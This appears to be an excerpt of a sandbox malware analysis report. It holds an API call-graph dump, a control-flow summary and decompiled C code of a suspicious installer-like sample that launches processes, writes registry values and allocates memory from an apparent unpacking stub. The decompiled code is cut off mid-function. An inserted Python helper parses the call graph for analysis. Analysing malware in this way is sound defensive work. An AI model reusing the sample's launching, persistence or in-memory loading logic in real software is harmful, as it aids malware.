2968->2969 2971 405696 2969->2971 2972 40565b 2969->2972 2970->2991 2973 40589f 2971->2973 2974 4056ae GetTempPathA 2971->2974 2979 405467 49 API calls 2972->2979 2975 406517 24 API calls 2973->2975 2977 4056eb 2974->2977 2978 4056c3 2974->2978 2975->2991 2976 406ce0 4 API calls 2980 402f7e 2976->2980 2985 405717 GetDriveTypeA 2977->2985 2986 40586c GetWindowsDirectoryA 2977->2986 2977->2991 3116 405467 2978->3116 2982 405678 2979->2982 2980->2657 2980->2663 2984 4044b9 20 API calls 2982->2984 2982->2991 2984->2991 2989 405730 GetFileAttributesA 2985->2989 3001 40572b 2985->3001 3150 40597d GetCurrentDirectoryA SetCurrentDirectoryA 2986->3150 2989->3001 2991->2976 2992 40597d 34 API calls 2992->3001 2993 405467 49 API calls 2993->2977 2994 402630 21 API calls 2994->3001 2996 4057c1 GetWindowsDirectoryA 2996->3001 2997 40658a CharPrevA 2998 4057e8 GetFileAttributesA 2997->2998 2999 4057fa CreateDirectoryA 2998->2999 2998->3001 2999->3001 3000 405827 SetFileAttributesA 3000->3001 3001->2985 3001->2986 3001->2989 3001->2991 3001->2992 3001->2994 3001->2996 3001->2997 3001->3000 3002 405467 49 API calls 3001->3002 3146 406952 3001->3146 3002->3001 3004 406268 3003->3004 3005 406249 3003->3005 3006 40597d 34 API calls 3004->3006 3007 4044b9 20 API calls 3005->3007 3008 40625f 3006->3008 3009 40625a 3007->3009 3010 406ce0 4 API calls 3008->3010 3011 406285 GetLastError 3009->3011 3012 403013 3010->3012 3011->3008 3012->2657 3012->2669 3014 403b2d 3013->3014 3014->3014 3015 403b72 3014->3015 3017 403b53 3014->3017 3216 404fe0 3015->3216 3018 406517 24 API calls 3017->3018 3019 403b70 3018->3019 3020 406298 10 API calls 3019->3020 3021 403b7b 3019->3021 3020->3021 3021->2674 3023 402622 3022->3023 3024 402583 3022->3024 3267 4024e0 GetWindowsDirectoryA 3023->3267 3025 4025e8 RegOpenKeyExA 3024->3025 3026 40258b 3024->3026 3028 402609 RegQueryInfoKeyA 3025->3028 3029 4025e3 3025->3029 3026->3029 3030 40259b RegOpenKeyExA 3026->3030 3031 4025d1 RegCloseKey 3028->3031 
3029->2679 3030->3029 3032 4025bc RegQueryValueExA 3030->3032 3031->3029 3032->3031 3034 403bdb 3033->3034 3049 403bec 3033->3049 3035 40468f 7 API calls 3034->3035 3035->3049 3036 403c03 memset 3036->3049 3037 403d13 3038 4044b9 20 API calls 3037->3038 3045 403d26 3038->3045 3039 40468f 7 API calls 3039->3049 3041 406ce0 4 API calls 3042 403f60 3041->3042 3042->2683 3043 403fd7 3043->3045 3366 402267 3043->3366 3044 403d7b CompareStringA 3044->3043 3044->3049 3045->3041 3047 403fab 3050 4044b9 20 API calls 3047->3050 3049->3036 3049->3037 3049->3039 3049->3043 3049->3044 3049->3045 3049->3047 3051 403f46 LocalFree 3049->3051 3052 403f1e LocalFree 3049->3052 3056 403cc7 CompareStringA 3049->3056 3067 403e10 3049->3067 3275 401ae8 3049->3275 3316 40202a memset memset RegCreateKeyExA 3049->3316 3342 403fef 3049->3342 3054 403fbe LocalFree 3050->3054 3051->3045 3052->3043 3052->3049 3054->3045 3056->3049 3057 403f92 3059 4044b9 20 API calls 3057->3059 3058 403e1f GetProcAddress 3060 403f64 3058->3060 3058->3067 3061 403fa9 3059->3061 3062 4044b9 20 API calls 3060->3062 3063 403f7c LocalFree 3061->3063 3064 403f75 FreeLibrary 3062->3064 3065 406285 GetLastError 3063->3065 3064->3063 3066 403f8b 3065->3066 3066->3045 3067->3057 3067->3058 3068 403f40 FreeLibrary 3067->3068 3069 403eff FreeLibrary 3067->3069 3356 406495 3067->3356 3068->3051 3069->3052 3071 40468f 7 API calls 3070->3071 3072 403a55 LocalAlloc 3071->3072 3073 403a6c 3072->3073 3074 403a8e 3072->3074 3076 4044b9 20 API calls 3073->3076 3075 40468f 7 API calls 3074->3075 3077 403a98 3075->3077 3078 403a7d 3076->3078 3080 403ac5 lstrcmpA 3077->3080 3081 403a9c 3077->3081 3079 406285 GetLastError 3078->3079 3087 402f64 3079->3087 3083 403ada 3080->3083 3084 403b0d LocalFree 3080->3084 3082 4044b9 20 API calls 3081->3082 3085 403aad LocalFree 3082->3085 3086 406517 24 API calls 3083->3086 3084->3087 3085->3087 3088 403aec LocalFree 3086->3088 3087->2649 3087->2657 3088->3087 3090 40628f 3089->3090 3090->2657 
3092 40468f 7 API calls 3091->3092 3093 40417d LocalAlloc 3092->3093 3094 404195 3093->3094 3095 4041a8 3093->3095 3096 4044b9 20 API calls 3094->3096 3097 40468f 7 API calls 3095->3097 3099 4041a6 3096->3099 3098 4041b5 3097->3098 3100 4041c5 lstrcmpA 3098->3100 3101 4041b9 3098->3101 3099->2657 3100->3101 3102 4041e6 LocalFree 3100->3102 3103 4044b9 20 API calls 3101->3103 3102->3099 3103->3102 3105 40171e _vsnprintf 3104->3105 3115 4062c9 FindResourceA 3105->3115 3107 406353 3109 406ce0 4 API calls 3107->3109 3108 4062cb LoadResource LockResource 3108->3107 3111 4062e0 3108->3111 3110 4051ca 3109->3110 3110->2953 3110->2954 3112 406355 FreeResource 3111->3112 3113 40631b FreeResource 3111->3113 3112->3107 3114 40171e _vsnprintf 3113->3114 3114->3115 3115->3107 3115->3108 3117 40548a 3116->3117 3118 40551a 3116->3118 3176 4053a1 3117->3176 3187 4058c8 3118->3187 3120 405495 3126 4054c2 GetSystemInfo 3120->3126 3127 40550c 3120->3127 3131 405581 3120->3131 3123 406ce0 4 API calls 3128 40559a 3123->3128 3124 40553b CreateDirectoryA 3129 405577 3124->3129 3130 405547 3124->3130 3125 40554d 3125->3131 3132 40597d 34 API calls 3125->3132 3138 4054da 3126->3138 3133 40658a CharPrevA 3127->3133 3128->2991 3140 402630 GetWindowsDirectoryA 3128->3140 3134 406285 GetLastError 3129->3134 3130->3125 3131->3123 3135 40555c 3132->3135 3133->3118 3136 40557c 3134->3136 3135->3131 3139 405568 RemoveDirectoryA 3135->3139 3136->3131 3137 40658a CharPrevA 3137->3127 3138->3127 3138->3137 3139->3131 3141 40265e 3140->3141 3142 40266f 3140->3142 3143 4044b9 20 API calls 3141->3143 3144 406ce0 4 API calls 3142->3144 3143->3142 3145 402687 3144->3145 3145->2977 3145->2993 3147 4069a1 3146->3147 3148 40696e GetDiskFreeSpaceA 3146->3148 3147->3001 3148->3147 3149 406989 MulDiv 3148->3149 3149->3147 3151 4059bb 3150->3151 3152 4059dd GetDiskFreeSpaceA 3150->3152 3153 4044b9 20 API calls 3151->3153 3154 405ba1 memset 3152->3154 3155 405a21 MulDiv 3152->3155 3156 4059cc 3153->3156 3157 
406285 GetLastError 3154->3157 3155->3154 3158 405a50 GetVolumeInformationA 3155->3158 3159 406285 GetLastError 3156->3159 3160 405bbc GetLastError FormatMessageA 3157->3160 3161 405ab5 SetCurrentDirectoryA 3158->3161 3162 405a6e memset 3158->3162 3163 4059d1 3159->3163 3164 405be3 3160->3164 3166 405acc 3161->3166 3165 406285 GetLastError 3162->3165 3170 406ce0 4 API calls 3163->3170 3167 4044b9 20 API calls 3164->3167 3168 405a89 GetLastError FormatMessageA 3165->3168 3172 405b0a 3166->3172 3174 405b20 3166->3174 3169 405bf5 SetCurrentDirectoryA 3167->3169 3168->3164 3169->3163 3171 405c11 3170->3171 3171->2977 3173 4044b9 20 API calls 3172->3173 3173->3163 3174->3163 3199 40268b 3174->3199 3180 4053bf 3176->3180 3177 40171e _vsnprintf 3177->3180 3178 40658a CharPrevA 3179 4053fa RemoveDirectoryA GetFileAttributesA 3178->3179 3179->3180 3181 40544f CreateDirectoryA 3179->3181 3180->3177 3180->3178 3182 405415 GetTempFileNameA 3180->3182 3181->3182 3183 40543a 3181->3183 3182->3183 3184 405429 DeleteFileA CreateDirectoryA 3182->3184 3185 406ce0 4 API calls 3183->3185 3184->3183 3186 405449 3185->3186 3186->3120 3188 4058d8 3187->3188 3188->3188 3189 4058df LocalAlloc 3188->3189 3190 4058f3 3189->3190 3191 405919 3189->3191 3192 4044b9 20 API calls 3190->3192 3194 40658a CharPrevA 3191->3194 3193 405906 3192->3193 3195 406285 GetLastError 3193->3195 3196 405534 3193->3196 3197 405931 CreateFileA LocalFree 3194->3197 3195->3196 3196->3124 3196->3125 3197->3193 3198 40595b CloseHandle GetFileAttributesA 3197->3198 3198->3193 3200 4026e5 3199->3200 3201 4026b9 3199->3201 3202 4026ea 3200->3202 3203 40271f 3200->3203 3204 40171e _vsnprintf 3201->3204 3205 40171e _vsnprintf 3202->3205 3208 40171e _vsnprintf 3203->3208 3214 4026e3 3203->3214 3206 4026cc 3204->3206 3207 4026fd 3205->3207 3210 4044b9 20 API calls 3206->3210 3211 4044b9 20 API calls 3207->3211 3212 402735 3208->3212 3209 406ce0 4 API calls 3213 40276d 3209->3213 3210->3214 3211->3214 3215 4044b9 20 API 
calls 3212->3215 3213->3163 3214->3209 3215->3214 3217 40468f 7 API calls 3216->3217 3218 404ff5 FindResourceA LoadResource LockResource 3217->3218 3219 405020 3218->3219 3232 40515f 3218->3232 3220 405057 3219->3220 3221 405029 GetDlgItem ShowWindow GetDlgItem ShowWindow 3219->3221 3235 404efd 3220->3235 3221->3220 3224 405060 3226 4044b9 20 API calls 3224->3226 3225 40507c 3227 4044b9 20 API calls 3225->3227 3230 405075 3225->3230 3226->3230 3227->3230 3228 405110 FreeResource 3229 40511d 3228->3229 3231 40513a 3229->3231 3233 4044b9 20 API calls 3229->3233 3230->3228 3230->3229 3231->3232 3234 40514c SendMessageA 3231->3234 3232->3019 3233->3231 3234->3232 3236 404f4a 3235->3236 3242 404fa1 3236->3242 3243 404980 3236->3243 3238 406ce0 4 API calls 3239 404fc6 3238->3239 3239->3224 3239->3225 3242->3238 3244 404990 3243->3244 3245 4049c2 lstrcmpA 3244->3245 3246 4049a5 3244->3246 3248 4049ba 3245->3248 3249 404a0e 3245->3249 3247 4044b9 20 API calls 3246->3247 3247->3248 3248->3242 3251 404b60 3248->3251 3249->3248 3254 40487a 3249->3254 3252 404b92 FindCloseChangeNotification 3251->3252 3253 404b76 3251->3253 3252->3253 3253->3242 3255 4048a2 CreateFileA 3254->3255 3257 404908 3255->3257 3258 4048e9 3255->3258 3257->3248 3258->3257 3259 4048ee 3258->3259 3262 40490c 3259->3262 3263 4048f5 CreateFileA 3262->3263 3265 404917 3262->3265 3263->3257 3264 404962 CharNextA 3264->3265 3265->3263 3265->3264 3266 404953 CreateDirectoryA 3265->3266 3266->3264 3268 402510 3267->3268 3269 40255b 3267->3269 3270 40658a CharPrevA 3268->3270 3271 406ce0 4 API calls 3269->3271 3272 402522 WritePrivateProfileStringA _lopen 3270->3272 3273 402569 3271->3273 3272->3269 3274 402548 _llseek _lclose 3272->3274 3273->3029 3274->3269 3276 401b25 3275->3276 3380 401a84 3276->3380 3278 401b57 3279 40658a CharPrevA 3278->3279 3281 401b8c 3278->3281 3279->3281 3280 4066c8 2 API calls 3282 401bd1 3280->3282 3281->3280 3283 401d73 3282->3283 3284 401bd9 CompareStringA 3282->3284 3286 4066c8 2 
API calls 3283->3286 3284->3283 3285 401bf7 GetFileAttributesA 3284->3285 3287 401d53 3285->3287 3288 401c0d 3285->3288 3289 401d7d 3286->3289 3290 401d64 3287->3290 3288->3287 3295 401a84 2 API calls 3288->3295 3291 401d81 CompareStringA 3289->3291 3292 401df8 LocalAlloc 3289->3292 3293 4044b9 20 API calls 3290->3293 3291->3292 3300 401d9b 3291->3300 3292->3290 3294 401e0b GetFileAttributesA 3292->3294 3296 401d6c 3293->3296 3297 401e1d 3294->3297 3314 401e45 3294->3314 3298 401c31 3295->3298 3302 406ce0 4 API calls 3296->3302 3297->3314 3299 401c50 LocalAlloc 3298->3299 3303 401a84 2 API calls 3298->3303 3299->3290 3301 401c67 GetPrivateProfileIntA GetPrivateProfileStringA 3299->3301 3300->3300 3304 401dbe LocalAlloc 3300->3304 3309 401cf8 3301->3309 3313 401cc2 3301->3313 3307 401ea1 3302->3307 3303->3299 3304->3290 3308 401de1 3304->3308 3307->3049 3312 40171e _vsnprintf 3308->3312 3310 401d23 3309->3310 3311 401d09 GetShortPathNameA 3309->3311 3315 40171e _vsnprintf 3310->3315 3311->3310 3312->3313 3313->3296 3386 402aac 3314->3386 3315->3313 3317 402256 3316->3317 3318 40209a 3316->3318 3319 406ce0 4 API calls 3317->3319 3321 40171e _vsnprintf 3318->3321 3323 4020dc 3318->3323 3320 402263 3319->3320 3320->3049 3322 4020af RegQueryValueExA 3321->3322 3322->3318 3322->3323 3324 4020e4 RegCloseKey 3323->3324 3325 4020fb GetSystemDirectoryA 3323->3325 3324->3317 3326 40658a CharPrevA 3325->3326 3327 40211b LoadLibraryA 3326->3327 3328 402179 GetModuleFileNameA 3327->3328 3329 40212e GetProcAddress FreeLibrary 3327->3329 3330 4021de RegCloseKey 3328->3330 3334 402177 3328->3334 3329->3328 3331 40214e GetSystemDirectoryA 3329->3331 3330->3317 3332 402165 3331->3332 3331->3334 3333 40658a CharPrevA 3332->3333 3333->3334 3334->3334 3335 4021b7 LocalAlloc 3334->3335 3336 4021ec 3335->3336 3337 4021cd 3335->3337 3339 40171e _vsnprintf 3336->3339 3338 4044b9 20 API calls 3337->3338 3338->3330 3340 402218 RegSetValueExA RegCloseKey LocalFree 3339->3340 3340->3317 3343 
404016 CreateProcessA 3342->3343 3354 404106 3342->3354 3344 404041 WaitForSingleObject GetExitCodeProcess 3343->3344 3345 4040c4 3343->3345 3350 404070 3344->3350 3347 406285 GetLastError 3345->3347 3346 406ce0 4 API calls 3348 404117 3346->3348 3349 4040c9 GetLastError FormatMessageA 3347->3349 3348->3049 3352 4044b9 20 API calls 3349->3352 3413 40411b 3350->3413 3352->3354 3353 404096 CloseHandle CloseHandle 3353->3354 3355 4040ba 3353->3355 3354->3346 3355->3354 3357 4064c2 3356->3357 3358 40658a CharPrevA 3357->3358 3359 4064d8 GetFileAttributesA 3358->3359 3360 406501 LoadLibraryA 3359->3360 3361 4064ea 3359->3361 3362 406508 3360->3362 3361->3360 3363 4064ee LoadLibraryExA 3361->3363 3364 406ce0 4 API calls 3362->3364 3363->3362 3365 406513 3364->3365 3365->3067 3367 402289 RegOpenKeyExA 3366->3367 3369 402381 3366->3369 3367->3369 3370 4022b1 RegQueryValueExA 3367->3370 3368 406ce0 4 API calls 3371 40238c 3368->3371 3369->3368 3372 402374 RegCloseKey 3370->3372 3373 4022e6 memset GetSystemDirectoryA 3370->3373 3371->3045 3372->3369 3374 402321 3373->3374 3375 40230f 3373->3375 3377 40171e _vsnprintf 3374->3377 3376 40658a CharPrevA 3375->3376 3376->3374 3378 40233f RegSetValueExA 3377->3378 3378->3372 3381 401a9a 3380->3381 3383 401aba 3381->3383 3385 401aaf 3381->3385 3399 40667f 3381->3399 3383->3278 3384 40667f 2 API calls 3384->3385 3385->3383 3385->3384 3387 402ad4 GetModuleFileNameA 3386->3387 3388 402be6 3386->3388 3398 402b02 3387->3398 3389 406ce0 4 API calls 3388->3389 3391 402bf5 3389->3391 3390 402af1 IsDBCSLeadByte 3390->3398 3391->3296 3392 402b11 CharNextA CharUpperA 3395 402b8d CharUpperA 3392->3395 3392->3398 3393 402bca CharNextA 3394 402bd3 CharNextA 3393->3394 3394->3398 3395->3398 3397 402b43 CharPrevA 3397->3398 3398->3388 3398->3390 3398->3392 3398->3393 3398->3394 3398->3397 3404 4065e8 3398->3404 3402 406689 3399->3402 3400 406648 IsDBCSLeadByte 3400->3402 3401 4066a5 3401->3381 3402->3400 3402->3401 3403 406697 CharNextA 3402->3403 
3403->3402 3405 4065f4 3404->3405 3405->3405 3406 4065fb CharPrevA 3405->3406 3407 406611 CharPrevA 3406->3407 3408 40660b 3407->3408 3409 40661e 3407->3409 3408->3407 3408->3409 3410 40663d 3409->3410 3411 406634 CharNextA 3409->3411 3412 406627 CharPrevA 3409->3412 3410->3398 3411->3410 3412->3410 3412->3411 3414 404132 3413->3414 3416 40412a 3413->3416 3417 401ea7 3414->3417 3416->3353 3418 401ed3 3417->3418 3419 401eba 3417->3419 3418->3416 3420 40256d 15 API calls 3419->3420 3420->3418 3422 401ff0 RegOpenKeyExA 3421->3422 3423 402026 3421->3423 3422->3423 3424 40200f RegDeleteValueA RegCloseKey 3422->3424 3423->2691 3424->3423 3489 404ca0 GlobalAlloc 3597 406a20 __getmainargs 3616 4019e0 3617 401a03 3616->3617 3618 401a24 GetDesktopWindow 3616->3618 3620 401a16 EndDialog 3617->3620 3621 401a20 3617->3621 3619 4043d0 11 API calls 3618->3619 3622 401a33 LoadStringA SetDlgItemTextA MessageBeep 3619->3622 3620->3621 3623 406ce0 4 API calls 3621->3623 3622->3621 3624 401a7e 3623->3624 3625 406bef _XcptFilter 3525 407270 _except_handler4_common 3626 4034f0 3627 403504 3626->3627 3647 4035b8 3626->3647 3628 40351b 3627->3628 3629 4035be GetDesktopWindow 3627->3629 3627->3647 3632 40354f 3628->3632 3633 40351f 3628->3633 3631 4043d0 11 API calls 3629->3631 3630 403526 3635 4035d6 3631->3635 3632->3630 3637 403559 ResetEvent 3632->3637 3633->3630 3636 40352d TerminateThread EndDialog 3633->3636 3634 403671 EndDialog 3634->3630 3638 4035e0 GetDlgItem SendMessageA GetDlgItem SendMessageA 3635->3638 3639 40361d SetWindowTextA CreateThread 3635->3639 3636->3630 3640 4044b9 20 API calls 3637->3640 3638->3639 3639->3630 3641 403646 3639->3641 3642 403581 3640->3642 3643 4044b9 20 API calls 3641->3643 3644 40359b SetEvent 3642->3644 3646 40358a SetEvent 3642->3646 3643->3647 3645 403680 4 API calls 3644->3645 3645->3647 3646->3630 3647->3630 3647->3634 3648 406ef0 3649 406f2d 3648->3649 3651 406f02 3648->3651 3650 406f27 ?terminate@ 3650->3649 3651->3649 3651->3650 3652 
4069b0 3653 4069b5 3652->3653 3661 406fbe GetModuleHandleW 3653->3661 3655 4069c1 __set_app_type __p__fmode __p__commode 3656 4069f9 3655->3656 3657 406a02 __setusermatherr 3656->3657 3658 406a0e 3656->3658 3657->3658 3663 4071ef _controlfp 3658->3663 3660 406a13 3662 406fcf 3661->3662 3662->3655 3663->3660 3490 6902026 3491 6902035 3490->3491 3494 69027c6 3491->3494 3495 69027e1 3494->3495 3496 69027ea CreateToolhelp32Snapshot 3495->3496 3497 6902806 Module32First 3495->3497 3496->3495 3496->3497 3498 6902815 3497->3498 3500 690203e 3497->3500 3501 6902485 3498->3501 3502 69024b0 3501->3502 3503 69024c1 VirtualAlloc 3502->3503 3504 69024f9 3502->3504 3503->3504 3504->3504
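Added example, not part of the Joe Sandbox report or its tooling: a small Python helper that turns the flat call-graph text the report renders into a per-function API table, tags functions by capability, and answers "which graph nodes lead to a tagged node" (for instance, which code paths end in the token/SID comparison at 4018e5-401999). Reading such chains out of a dump of this size by eye is error-prone, and the same parser can be pointed at other reports. It assumes the token layout seen here ("<id> <hexaddr> [API ...]", "<n> API calls" for collapsed nodes, "<src>-><dst>" for edges); the API-to-capability mapping and the sample input are constructed for the example and are not a Joe Sandbox signature definition.

```python
"""Added example (not part of the Joe Sandbox report): parse the flat
call-graph text that the report renders, tag each function by the Windows
APIs it calls, and find which graph nodes lead to a tagged one.

Token stream handled: a node is "<id> <hexaddr> [API ...]" or
"<id> <hexaddr> <n> API calls" (a collapsed node); an edge is "<src>-><dst>".
"""
import re
from collections import defaultdict, deque

NODE_ID = re.compile(r"^\d{1,4}$")         # decimal graph node numbers
ADDRESS = re.compile(r"^[0-9a-f]{5,8}$")   # hex code addresses
EDGE = re.compile(r"^(\d+)->(\d+)$")

# API -> capability tag. Assumed mapping chosen for this example only.
API_TAGS = {
    "OpenProcessToken": "token-inspection",
    "GetTokenInformation": "token-inspection",
    "AllocateAndInitializeSid": "sid-compare",
    "EqualSid": "sid-compare",
    "CreateToolhelp32Snapshot": "module-enumeration",
    "Module32First": "module-enumeration",
    "VirtualAlloc": "memory-allocation",
    "RegCreateKeyExA": "registry-write",
    "RegSetValueExA": "registry-write",
    "CreateProcessA": "process-creation",
}


def parse_call_graph(text):
    """Return ({node_id: (address, [apis], collapsed_call_count)}, [(src, dst)])."""
    nodes, edges = {}, []
    tokens = text.split()
    current = None
    i = 0
    while i < len(tokens):
        tok = tokens[i]
        nxt = tokens[i + 1] if i + 1 < len(tokens) else ""
        m = EDGE.match(tok)
        if m:
            edges.append((int(m.group(1)), int(m.group(2))))
        elif NODE_ID.match(tok) and ADDRESS.match(nxt):
            current = int(tok)                  # new node: "<id> <hexaddr>"
            nodes[current] = [nxt, [], 0]
            i += 1                              # consume the address
        elif NODE_ID.match(tok) and nxt == "API" and current is not None:
            nodes[current][2] = int(tok)        # "<n> API calls" collapsed node
            i += 2                              # consume "API calls"
        elif current is not None:
            nodes[current][1].append(tok)       # an API name on the current node
        i += 1
    return {k: tuple(v) for k, v in nodes.items()}, edges


def tag_functions(nodes):
    """Map capability tag -> sorted (address, api) pairs that triggered it."""
    hits = defaultdict(set)
    for addr, apis, _ in nodes.values():
        for api in apis:
            if api in API_TAGS:
                hits[API_TAGS[api]].add((addr, api))
    return {tag: sorted(pairs) for tag, pairs in hits.items()}


def nodes_with_tag(nodes, tag):
    """Node ids whose API list carries the given capability tag."""
    return {nid for nid, (_, apis, _) in nodes.items()
            if any(API_TAGS.get(a) == tag for a in apis)}


def reaching(edges, targets):
    """Node ids from which any target node is reachable (reverse BFS over edges)."""
    preds = defaultdict(list)
    for src, dst in edges:
        preds[dst].append(src)
    seen, work = set(), deque(targets)
    while work:
        for p in preds[work.popleft()]:
            if p not in seen:
                seen.add(p)
                work.append(p)
    return seen


# Constructed sample: fragments copied from the report's call-graph text, with
# the token-check chain simplified so the sample is self-contained.
SAMPLE = """
2813 4018a3 2802->2813 2814 4018d5 2813->2814 2816 406ce0 4 API calls 2820->2816
2819 4018e5 GetCurrentProcess OpenProcessToken 2814->2819 2821 401900 GetTokenInformation 2819->2821
2822 401918 GetLastError 2821->2822 2824 401927 LocalAlloc 2822->2824
2825 401938 GetTokenInformation 2824->2825 2828 40194e AllocateAndInitializeSid 2825->2828
2829 40196e 2828->2829 2830 401999 FreeSid 2829->2830 2831 401975 EqualSid 2829->2831
3496 69027ea CreateToolhelp32Snapshot 3495->3496 3497 6902806 Module32First 3495->3497
3503 69024c1 VirtualAlloc 3502->3503 3343 404016 CreateProcessA 3342->3343
3340 402218 RegSetValueExA RegCloseKey LocalFree 3339->3340
"""

if __name__ == "__main__":
    nodes, edges = parse_call_graph(SAMPLE)
    for tag, pairs in sorted(tag_functions(nodes).items()):
        print(f"{tag:20s} {', '.join(f'{a}:{n}' for a, n in pairs)}")
    callers = reaching(edges, nodes_with_tag(nodes, "sid-compare"))
    print("nodes leading to the SID comparison:", sorted(callers))
```

The node/address distinction relies on node numbers being short decimals and addresses being 5-8 hex digits, which holds for the text in this report (including the all-digit address 406218 and the 7-digit addresses at 69020xx); the CFG edge list for a single function uses a different "<start>-<end>" block notation and is not handled by this parser.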

Control-flow Graph

Legend: Executed / Not Executed (basic-block colouring in the rendered graph).

control_flow_graph for E00403BA2 (rendered graph; the extracted block/edge list is omitted here). The function starts at block 403ba2-403bd9 and exits through 403f4f-403f63 (call 406ce0). Its basic blocks call memset (403c03), CompareStringA (403cc7, 403d7b), GetProcAddress (403e1f), FreeLibrary (403eff, 403f40, 403f75), LocalFree (403f1e, 403f46, 403f7c, 403fbe) and the internal routines 40468f, 4044b9, 401781, 401ae8, 40202a, 402267, 403fef, 406285 and 406495.
C-Code - Quality: 82%
E00403BA2() {
	signed int _v8;
	signed int _v12;
	char _v276;
	char _v280;
	short _v300;
	intOrPtr _v304;
	void _v348;
	char _v352;
	intOrPtr _v356;
	signed int _v360;
	short _v364;
	char* _v368;
	intOrPtr _v372;
	void* _v376;
	intOrPtr _v380;
	char _v384;
	signed int _v388;
	intOrPtr _v392;
	signed int _v396;
	signed int _v400;
	signed int _v404;
	void* _v408;
	void* _v424;
	void* __ebx;
	void* __edi;
	void* __esi;
	signed int _t69;
	signed int _t76;
	void* _t77;
	signed int _t79;
	short _t96;
	signed int _t97;
	intOrPtr _t98;
	signed int _t101;
	signed int _t104;
	signed int _t108;
	int _t112;
	void* _t115;
	signed char _t118;
	void* _t125;
                                                                                                                                                                                                                                    				signed int _t127;
                                                                                                                                                                                                                                    				void* _t128;
                                                                                                                                                                                                                                    				struct HINSTANCE__* _t129;
                                                                                                                                                                                                                                    				void* _t130;
                                                                                                                                                                                                                                    				short _t137;
                                                                                                                                                                                                                                    				char* _t140;
                                                                                                                                                                                                                                    				signed char _t144;
                                                                                                                                                                                                                                    				signed char _t145;
                                                                                                                                                                                                                                    				signed int _t149;
                                                                                                                                                                                                                                    				void* _t150;
                                                                                                                                                                                                                                    				void* _t151;
                                                                                                                                                                                                                                    				signed int _t153;
                                                                                                                                                                                                                                    				void* _t155;
                                                                                                                                                                                                                                    				void* _t156;
                                                                                                                                                                                                                                    				signed int _t157;
                                                                                                                                                                                                                                    				signed int _t162;
                                                                                                                                                                                                                                    				signed int _t164;
                                                                                                                                                                                                                                    				void* _t165;
                                                                                                                                                                                                                                    
                                                                                                                                                                                                                                    				_t164 = (_t162 & 0xfffffff8) - 0x194;
                                                                                                                                                                                                                                    				_t69 =  *0x408004; // 0x8f135e3b
                                                                                                                                                                                                                                    				_v8 = _t69 ^ _t164;
                                                                                                                                                                                                                                    				_t153 = 0;
                                                                                                                                                                                                                                    				 *0x409124 =  *0x409124 & 0;
                                                                                                                                                                                                                                    				_t149 = 0;
                                                                                                                                                                                                                                    				_v388 = 0;
                                                                                                                                                                                                                                    				_v384 = 0;
                                                                                                                                                                                                                                    				_t165 =  *0x408a28 - _t153; // 0x0
                                                                                                                                                                                                                                    				if(_t165 != 0) {
                                                                                                                                                                                                                                    					L3:
                                                                                                                                                                                                                                    					_t127 = 0;
                                                                                                                                                                                                                                    					_v392 = 0;
                                                                                                                                                                                                                                    					while(1) {
                                                                                                                                                                                                                                    						_v400 = _v400 & 0x00000000;
                                                                                                                                                                                                                                    						memset( &_v348, 0, 0x44);
                                                                                                                                                                                                                                    						_t164 = _t164 + 0xc;
                                                                                                                                                                                                                                    						_v348 = 0x44;
                                                                                                                                                                                                                                    						if( *0x408c42 != 0) {
                                                                                                                                                                                                                                    							goto L26;
                                                                                                                                                                                                                                    						}
                                                                                                                                                                                                                                    						_t146 =  &_v396;
                                                                                                                                                                                                                                    						_t115 = E0040468F("SHOWWINDOW",  &_v396, 4);
                                                                                                                                                                                                                                    						if(_t115 == 0 || _t115 > 4) {
                                                                                                                                                                                                                                    							L25:
                                                                                                                                                                                                                                    							_t146 = 0x4b1;
                                                                                                                                                                                                                                    							E004044B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                                                    							 *0x409124 = 0x80070714;
                                                                                                                                                                                                                                    							goto L62;
                                                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                                                    							if(_v396 != 1) {
                                                                                                                                                                                                                                    								__eflags = _v396 - 2;
                                                                                                                                                                                                                                    								if(_v396 != 2) {
                                                                                                                                                                                                                                    									_t137 = 3;
                                                                                                                                                                                                                                    									__eflags = _v396 - _t137;
                                                                                                                                                                                                                                    									if(_v396 == _t137) {
                                                                                                                                                                                                                                    										_v304 = 1;
                                                                                                                                                                                                                                    										_v300 = _t137;
                                                                                                                                                                                                                                    									}
                                                                                                                                                                                                                                    									goto L14;
                                                                                                                                                                                                                                    								}
                                                                                                                                                                                                                                    								_push(6);
                                                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                                                    								_pop(0);
                                                                                                                                                                                                                                    								goto L11;
                                                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                                                    								_v304 = 1;
                                                                                                                                                                                                                                    								L11:
                                                                                                                                                                                                                                    								_v300 = 0;
                                                                                                                                                                                                                                    								L14:
                                                                                                                                                                                                                                    								if(_t127 != 0) {
                                                                                                                                                                                                                                    									L27:
                                                                                                                                                                                                                                    									_t155 = 1;
                                                                                                                                                                                                                                    									__eflags = _t127 - 1;
                                                                                                                                                                                                                                    									if(_t127 != 1) {
                                                                                                                                                                                                                                    										L31:
                                                                                                                                                                                                                                    										_t132 =  &_v280;
                                                                                                                                                                                                                                    										_t76 = E00401AE8( &_v280,  &_v408,  &_v404); // executed
                                                                                                                                                                                                                                    										__eflags = _t76;
                                                                                                                                                                                                                                    										if(_t76 == 0) {
                                                                                                                                                                                                                                    											L62:
                                                                                                                                                                                                                                    											_t77 = 0;
                                                                                                                                                                                                                                    											L63:
                                                                                                                                                                                                                                    											_pop(_t150);
                                                                                                                                                                                                                                    											_pop(_t156);
                                                                                                                                                                                                                                    											_pop(_t128);
                                                                                                                                                                                                                                    											return E00406CE0(_t77, _t128, _v12 ^ _t164, _t146, _t150, _t156);
                                                                                                                                                                                                                                    										}
                                                                                                                                                                                                                                    										_t157 = _v404;
                                                                                                                                                                                                                                    										__eflags = _t149;
                                                                                                                                                                                                                                    										if(_t149 != 0) {
                                                                                                                                                                                                                                    											L37:
                                                                                                                                                                                                                                    											__eflags = _t157;
                                                                                                                                                                                                                                    											if(_t157 == 0) {
                                                                                                                                                                                                                                    												L57:
                                                                                                                                                                                                                                    												_t151 = _v408;
                                                                                                                                                                                                                                    												_t146 =  &_v352;
                                                                                                                                                                                                                                    												_t130 = _t151; // executed
                                                                                                                                                                                                                                    												_t79 = E00403FEF(_t130,  &_v352); // executed
                                                                                                                                                                                                                                    												__eflags = _t79;
                                                                                                                                                                                                                                    												if(_t79 == 0) {
                                                                                                                                                                                                                                    													L61:
                                                                                                                                                                                                                                    													LocalFree(_t151);
                                                                                                                                                                                                                                    													goto L62;
                                                                                                                                                                                                                                    												}
                                                                                                                                                                                                                                    												L58:
